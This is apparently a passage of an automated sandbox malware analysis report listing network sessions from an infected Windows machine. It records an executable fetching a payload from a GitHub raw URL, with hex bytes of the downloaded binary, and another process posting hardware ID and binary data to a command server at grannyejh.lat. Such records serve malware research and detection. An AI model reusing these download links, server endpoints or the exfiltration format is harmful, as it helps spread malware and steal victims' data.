                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=c2t504bf24ci8a57cf4pcg1lan; expires=Mon, 14 Apr 2025 07:08:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jInaRotlxlgaf6dTfRKmK%2FIIFxj2tqaHk63T%2Bs8g4fSp1icFzkk0K5nmxpGmGcyyRpykglO0itXFFMuG7xKw4IVOce%2BIczo%2FcOQ9JC8Y3vcRxCH7YWfoqCpiXHTX3K3T"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b2026e4641e1-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2400&min_rtt=2400&rtt_var=900&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9718&delivery_rate=1215147&cwnd=243&unsent_bytes=0&cid=230e9759fa9964a1&ts=814&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          18192.168.2.44986420.233.83.1454437772C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:24 UTC117OUTGET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: github.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-12-19 13:21:25 UTC568INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                          Server: GitHub.com
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:25 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                          Location: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                          2024-12-19 13:21:25 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                          Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          19192.168.2.449872104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:25 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=GDTGS5NE3BIHSYRNT
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 20436
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:25 UTC15331OUTData Raw: 2d 2d 47 44 54 47 53 35 4e 45 33 42 49 48 53 59 52 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 47 44 54 47 53 35 4e 45 33 42 49 48 53 59 52 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 44 54 47 53 35 4e 45 33 42 49 48 53 59 52 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33
                                                                                                                                                                                                                                                          Data Ascii: --GDTGS5NE3BIHSYRNTContent-Disposition: form-data; name="hwid"4D9AEFC7455232AC00D57F9DDD37BE0C--GDTGS5NE3BIHSYRNTContent-Disposition: form-data; name="pid"3--GDTGS5NE3BIHSYRNTContent-Disposition: form-data; name="lid"yau6Na--69897833
                                                                                                                                                                                                                                                          2024-12-19 13:21:25 UTC5105OUTData Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
                                                                                                                                                                                                                                                          Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                          2024-12-19 13:21:26 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:26 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=cql0jifbo6fe6is8dbl4h3qtj4; expires=Mon, 14 Apr 2025 07:08:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0IcgpiZfiobSgd6VzZuosUYoo%2FPqtGJhpQfZ%2BIl7ZHJ0OITu%2F4VBaJP%2Bu1PPZUEcbEFZrF9HhYVon0qET2EdaccSTtrkRjiQt0AtSHs0S0fs0gMJPzv9TwizIG3Hfva"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b2160d0bc33f-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1671&rtt_var=633&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2829&recv_bytes=21394&delivery_rate=1721698&cwnd=235&unsent_bytes=0&cid=a1ab237d9788c24e&ts=996&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          20192.168.2.449878185.199.108.1334437772C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:26 UTC128OUTGET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC900INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 1275904
                                                                                                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          ETag: "f6e395433fd455488d8d231a7e135bc540ae3f4d4024c956534b849ab403e860"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          X-GitHub-Request-Id: C298:CAE1D:65538C:721244:67641B6A
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:27 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740053-EWR
                                                                                                                                                                                                                                                          X-Cache: HIT
                                                                                                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                                                                                                          X-Timer: S1734614487.192340,VS0,VE81
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: 79072b0c3f704b78f4ec05ca526a6149b2fb54f4
                                                                                                                                                                                                                                                          Expires: Thu, 19 Dec 2024 13:26:27 GMT
                                                                                                                                                                                                                                                          Source-Age: 0
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 ec 03 00 00 ac 00 00 00 00 00 00 f7 78 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 3b 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 50 2d 00 14 02 00
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gx@;@ P-
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: 0e 7f 54 d0 cc 87 8b 5f c6 42 59 ee 49 48 fd cb 31 5a 82 d1 c3 d1 61 9b 5e fd 57 db b5 b5 3e 51 67 3b 63 af 11 89 31 1a d4 8b 30 57 33 eb 43 43 55 52 38 e5 c0 b6 d6 b0 63 62 2f 79 94 1a 5e cd f2 ad bd e1 46 7c 66 5c 7a 31 d1 ec dd a3 d0 59 5a 9f 30 3a d4 e6 44 00 91 39 74 0d 99 51 63 9f cc 9c 97 3b f9 ac 97 9e a7 ca d2 eb 15 06 c6 ec 0b 1e 17 48 a8 63 4e c6 12 ba 90 93 2c 12 d4 60 e7 30 25 88 e3 c5 af 0b cf f9 9a cc b8 c5 01 11 0c 2d a2 23 67 22 ae fd 24 1e 22 09 af b9 11 d9 5a c1 d6 49 52 12 f8 5f 8f 3c ff 3b f7 2d 2c 05 47 96 1a 12 16 70 77 7a 70 f0 1a 01 69 13 c8 14 ab e9 86 13 f7 89 f8 82 34 08 51 9d 20 75 f4 ff 41 f5 60 19 d3 4b 0f 23 84 dd 8a 6c 32 8d 7b 77 55 43 8e a4 a1 bb 9a 1a 24 ae d3 81 76 6f 95 35 dc 6c 55 4a f1 81 d5 4d d9 84 ac 87 69 f4 e5
                                                                                                                                                                                                                                                          Data Ascii: T_BYIH1Za^W>Qg;c10W3CCUR8cb/y^F|f\z1YZ0:D9tQc;HcN,`0%-#g"$"ZIR_<;-,Gpwzpi4Q uA`K#l2{wUC$vo5lUJMi
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: 9d e9 c8 ac a2 4e 78 1f 42 08 1d dd 91 fb e3 c4 d3 53 70 95 d8 12 55 99 4d d4 5a 23 46 b1 1f 5a 91 5f a3 af 50 e5 26 cb 28 18 67 eb 6f 3e 0a 95 e8 c2 9d 99 43 e7 53 1b 05 00 3f 0a ba 73 e3 b7 09 81 eb 04 48 7e 49 67 aa 91 73 7f c7 31 36 f1 2b b3 03 b6 7f 5e db 8e a4 13 e3 ed 8d 45 99 30 89 56 fa 11 dd 91 37 75 73 5c fe 7d 7c 9b 89 d5 a5 70 e5 01 37 56 22 a0 b1 63 5e 42 af 07 ac de 33 9d 7a 20 8e 8d 06 6f c9 75 94 3c b4 5b 4a 6a a5 54 95 f6 18 af a0 5b 6a 58 3a d2 81 26 92 ee 17 7a 24 fe ee 41 22 31 80 ff df c8 a8 cb c5 9e e9 4f 60 4a 2b 75 e6 44 1b 86 ac 35 53 46 ce bd 29 49 5f 09 e4 89 17 b8 86 90 44 de 65 35 64 cb dc d3 85 46 40 49 55 96 da 32 4a e3 91 48 16 80 69 05 54 20 47 88 f4 e1 2e 1f ff 11 6d 87 93 62 b9 a2 12 95 ee 55 17 0a f8 2f 9a 2c 46 66 a0
                                                                                                                                                                                                                                                          Data Ascii: NxBSpUMZ#FZ_P&(go>CS?sH~Igs16+^E0V7us\}|p7V"c^B3z ou<[JjT[jX:&z$A"1O`J+uD5SF)I_De5dF@IU2JHiT G.mbU/,Ff
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: f1 78 84 3d 8c 25 5e d0 c4 01 d9 92 bb 7f bc 61 9a 73 82 68 6d f7 c4 36 2a 68 69 f9 9d fc 06 cd 2d 8e 9b 32 53 16 82 88 01 ee 97 fb 71 1d 50 af 95 ac 96 80 0b bb b2 76 df 70 11 73 bd 31 04 52 b6 bf 0e aa b1 b1 2c eb 54 2b 15 c6 45 a9 73 42 88 44 30 f1 3d 77 40 ce 07 c7 7f dc e9 98 8f 55 74 ca ca e5 17 e5 8e bf 5f 91 a4 3b ed d2 b8 50 05 f0 8a ac 75 80 ec 18 2a bc 87 b5 50 94 84 43 54 a1 65 f6 a2 34 b0 63 58 59 98 a8 d1 93 c3 c8 c1 87 9c 54 9b 46 dc 02 49 7a 1d 85 00 be d3 45 82 02 cc 71 e6 0c 91 2c d4 93 4a d3 54 9c ba 68 d8 48 74 f0 4c 08 98 03 7d 59 de 02 c1 1e d2 cf ca ad b0 7f 8f c3 dc bd c2 b9 93 9a ee 98 bc da ee 8c 05 61 d9 7e b7 ac ea bd f5 b2 ba 81 2a 96 5b d4 02 53 aa b5 e8 0e f5 31 a6 2d 26 36 c3 c3 2f 38 32 d9 46 34 4a da 7c a3 ad 41 7d 0e 29
                                                                                                                                                                                                                                                          Data Ascii: x=%^ashm6*hi-2SqPvps1R,T+EsBD0=w@Ut_;Pu*PCTe4cXYTFIzEq,JThHtL}Ya~*[S1-&6/82F4J|A})
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: 7f 3c fb cf 9b ee e5 f5 61 04 ec 17 45 da 7a 22 fb 89 b1 6e a8 3c 39 03 48 4f a6 38 c9 32 32 a0 f3 de db f8 ac f9 60 db 2c de a3 b3 61 f0 7f db 6b 32 72 05 34 1b 2e da 3b fe 0a b0 3c 31 bf 0a 3e 0c 9d 8f be a0 b8 2d 8b e3 17 00 96 b5 14 c6 0b 31 e5 33 f3 e2 f4 b8 62 fc eb 87 6b bf 83 6a ea 82 2f 67 5c a0 3f dc 66 9b 8b 69 3b 42 0d 62 b6 06 8c 74 8d dc 29 30 7a 57 67 e2 38 c1 23 00 6e 42 48 ca da bb f5 c7 01 f4 19 03 69 65 6d e5 b0 ea ec 8e f1 7e 27 fe 5c ec 10 5a 69 9d 5c b5 ed 55 10 9a 3c df c4 3d fa 6e 15 73 ba 43 75 e8 cd 0b 2f 23 f3 26 c1 81 f4 6a 6c 33 fd b4 fc 44 9e 68 cb 8b b7 8b 38 f0 26 cc 60 6b 6c 13 a0 48 72 54 63 ff d0 69 80 78 e0 0a d8 62 bb 4d 5d 85 36 3c 9e 83 4f 77 56 60 6d a4 18 2c 70 5e 18 63 5c 10 2b a2 6c 51 4c 48 dc 09 7a 55 4f f1 08
                                                                                                                                                                                                                                                          Data Ascii: <aEz"n<9HO822`,ak2r4.;<1>-13bkj/g\?fi;Bbt)0zWg8#nBHiem~'\Zi\U<=nsCu/#&jl3Dh8&`klHrTcixbM]6<OwV`m,p^c\+lQLHzUO
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: cd 3a 89 7c 61 f9 ad e9 47 47 81 23 fc 3a 2f b5 f0 4d 0b 8b 29 d0 2b 7f 92 b1 2f ff 4c 92 2e ac dd 43 f6 04 93 d5 ff 41 01 3b 9a b7 74 94 f0 2d f7 6f fe c9 1a 4a e2 72 10 49 be 79 64 1e 59 98 c5 73 c1 2a d2 fa ae 9a 87 53 c6 22 fe 8d 75 6a ab 48 e1 0b c7 82 2f 89 a7 52 6e 2e fb 11 41 32 56 e6 f7 04 a9 c2 7e a9 73 03 b5 5e 4c b5 79 b8 36 79 89 d0 e1 a9 f6 25 00 ee 74 88 51 73 0e b8 8a 09 dd bc 9f 34 a0 74 5a 0c 14 42 ca 33 44 ed b5 46 6e e8 2b e7 68 75 d2 d0 6a 06 80 61 d9 4c 48 d3 75 e6 7b ea 03 9c 56 b3 9a a2 fe 7e 5d c7 98 7c ba a6 70 30 fc 93 de 65 4c 0d 22 8d ae 53 69 de 64 a8 93 ee 6e 80 34 db 95 7f e2 f3 f8 6e b6 ca 18 0f 9b bd 92 b3 88 92 2f a1 09 99 e0 be 9a da 67 4a 12 e3 a6 80 3e bc 60 ae d1 a3 80 48 74 82 1e 7c 29 e8 86 3a 66 74 63 bf 32 84 b6
                                                                                                                                                                                                                                                          Data Ascii: :|aGG#:/M)+/L.CA;t-oJrIydYs*S"ujH/Rn.A2V~s^Ly6y%tQs4tZB3DFn+hujaLHu{V~]|p0eL"Sidn4n/gJ>`Ht|):ftc2
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: 2e 34 d2 36 c0 1c 87 05 5c 19 ce a7 bd 39 4e 7d 8b 06 42 78 48 49 6f d7 9e dc 3a 51 28 cf d3 b8 60 bb 66 7f 15 75 62 46 09 a7 b7 e2 4e f9 4c ce 36 6b 96 d8 1c 3d 12 ab 4f fa 4a 93 46 1d e0 e5 da 7b 7e ea 20 1a 24 16 a4 57 46 00 78 d6 d2 52 42 48 61 fb 11 84 e4 88 38 35 08 87 fe d7 21 d2 15 3b b1 d6 32 14 35 9b f5 24 fd 97 82 12 89 fb c8 42 80 ab c0 fe 57 3f b0 f7 05 cf c8 4c 9d 0d 28 61 a6 4a ff df 92 66 f3 77 e4 f4 ab b8 1a cc e3 84 f3 c5 e8 a6 23 97 5e 97 2e 49 f7 87 b2 1c e7 c3 6d 90 57 d5 93 b3 a0 57 ea 3b 13 7f a6 ac 57 86 84 70 7a 33 ee a4 49 61 6c c4 db 59 bf 8b 5d d3 90 df 70 fd 12 fb 6f ef 9c ec 2b 51 d9 e7 01 c0 d1 e4 bd b0 75 e7 7c 94 e3 8c 0f 18 6c 6a 23 dc 80 94 92 65 ab fb 9e 3e e6 dd 0f dc 18 39 0c 3b 45 ff 79 45 9c 77 a8 ef 64 09 40 9f a1
                                                                                                                                                                                                                                                          Data Ascii: .46\9N}BxHIo:Q(`fubFNL6k=OJF{~ $WFxRBHa85!;25$BW?L(aJfw#^.ImWW;Wpz3IalY]po+Qu|lj#e>9;EyEwd@
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: 6f 27 c8 2d a7 9d ad 5b 54 d5 1a 44 4a cf 01 57 bf fa c7 40 0f 62 46 a9 78 3b 53 2e c9 60 34 8b 54 3e c2 aa 4c 64 e8 0f 4d 01 52 ca 2e b9 4a 41 71 e9 1a 17 8b 36 85 2b 37 1c b2 47 c3 92 79 78 44 aa e4 73 45 c3 7a ec a7 e8 f7 97 f9 e5 71 06 ae 79 53 00 5a b4 d4 63 52 3c 66 0d 2b ba 47 e1 89 5a ea fe 50 67 3d 24 e0 25 c3 bf 2c 06 02 81 ba 53 b7 8c e7 69 41 5d 67 e5 27 5f ec 50 ae ad 59 7c 47 c4 d3 9c 51 f8 c1 d4 af f7 51 63 69 25 2f 55 56 a6 7f 1d 5e 56 09 83 c4 2a 95 b4 0c d0 59 9a b3 d2 54 43 c2 53 ce ca 88 f2 ab 02 49 f5 6a 13 ba 37 af 1a e5 a9 c6 63 09 86 3a e5 69 a5 da 02 b7 22 96 08 04 32 f5 0f b5 82 78 1a 6a f8 99 d4 fd 19 e7 d9 d9 7c a0 8f df f7 83 e0 1f 60 60 97 60 39 64 30 6a d4 64 cd b7 ed b6 a7 f9 39 b4 fe 6f c4 7e 33 ca a7 36 25 c0 31 bf 78 3c
                                                                                                                                                                                                                                                          Data Ascii: o'-[TDJW@bFx;S.`4T>LdMR.JAq6+7GyxDsEzqySZcR<f+GZPg=$%,SiA]g'_PY|GQQci%/UV^V*YTCSIj7c:i"2xj|```9d0jd9o~36%1x<
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: ba 49 69 e7 8f 7d d1 5f af da 49 9c 64 28 98 59 36 b3 a4 1d f8 cb 15 30 7b 25 96 6a 09 2c f9 20 89 72 a7 05 a6 ea 8d 9a 4d 6f 93 43 f8 1a 0b 86 c5 cd 49 b1 ae e6 66 89 2c 31 6d 66 65 ba b9 26 f7 bc e2 7e 04 08 8b 2a 14 e9 10 fd 4f e9 bc c6 a4 d3 a8 ff e7 d6 37 51 ca 11 be 2b c4 19 d5 58 47 e5 06 47 a6 80 1f cd 2c cd 1b 2f fe bf 7a e4 22 a8 58 99 b7 c2 f4 2a 61 f9 4b 1f 10 3a 80 ad c6 6c c2 ad 0a e8 42 64 3a 1d 96 d8 35 ce 0e d9 3d a7 34 55 40 23 4e ec 0a 67 8f e3 ae f1 06 2c 05 91 70 68 31 70 bc 85 3c c2 34 7e 0b 71 0b ef a9 16 2d 07 43 97 d6 3c d9 85 4d 50 fa be f0 ac b9 0b 8b 20 9b 22 09 1f cb 88 e8 11 b7 86 f0 e6 ed 30 8d 84 c5 b5 0c 33 84 45 94 ff 9e 5f 82 1d d6 2a c6 a7 07 43 f5 be f1 7d dc 32 9e 71 98 2a 5e aa e3 b3 e4 3c fe fd 1c ba 1b fe 1d c0 d9
                                                                                                                                                                                                                                                          Data Ascii: Ii}_Id(Y60{%j, rMoCIf,1mfe&~*O7Q+XGG,/z"X*aK:lBd:5=4U@#Ng,ph1p<4~q-C<MP "03E_*C}2q*^<
                                                                                                                                                                                                                                                          2024-12-19 13:21:27 UTC1378INData Raw: 52 e0 1f 58 23 09 4b ac 81 56 f8 11 a3 e9 9a 43 0c 60 01 1d ac 7a b7 e5 2b f8 87 42 a7 8f 08 53 15 76 f7 ad 7b 62 db 9b f9 e8 88 8f 97 0a 19 31 58 c4 e7 2b 34 56 b1 00 87 dc 42 8f cf 0b 67 f8 38 50 45 9a 20 8e fa c9 f1 85 14 bc 23 26 13 67 95 23 3c fc 05 7b 68 9c 69 8d 73 5b fc c0 db 6e da 60 44 01 ed 8b 92 68 d9 2c 74 c3 17 41 9d 40 7d e1 6f c6 35 d8 97 5d ee 57 5b 90 e9 51 03 2c 68 50 87 88 56 9d 16 a8 1b ac 3f 66 16 fd ff b9 0c 32 82 96 49 d1 4a 63 f5 a8 47 9b 08 b8 45 61 aa 63 64 be c9 9a f2 0b dd 64 ef 60 ad 54 73 91 db b5 0f 39 94 2a 4d b1 f6 81 20 51 06 ac df e4 cd 78 af 96 19 fe 1a c8 4a 65 e8 79 5d cc c5 8d d9 1d f9 22 55 8a 86 da 2b f0 00 1c 49 5f d3 1c 62 bf 22 c3 33 ec d2 ad d3 ab 98 d2 42 8b 64 a6 41 08 fd 7f a6 3c da c3 89 a7 2e 33 dc 08 02
                                                                                                                                                                                                                                                          Data Ascii: RX#KVC`z+BSv{b1X+4VBg8PE #&g#<{his[n`Dh,tA@}o5]W[Q,hPV?f2IJcGEacdd`Ts9*M QxJey]"U+I_b"3BdA<.3


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          21192.168.2.449886142.250.181.1324434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:28 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
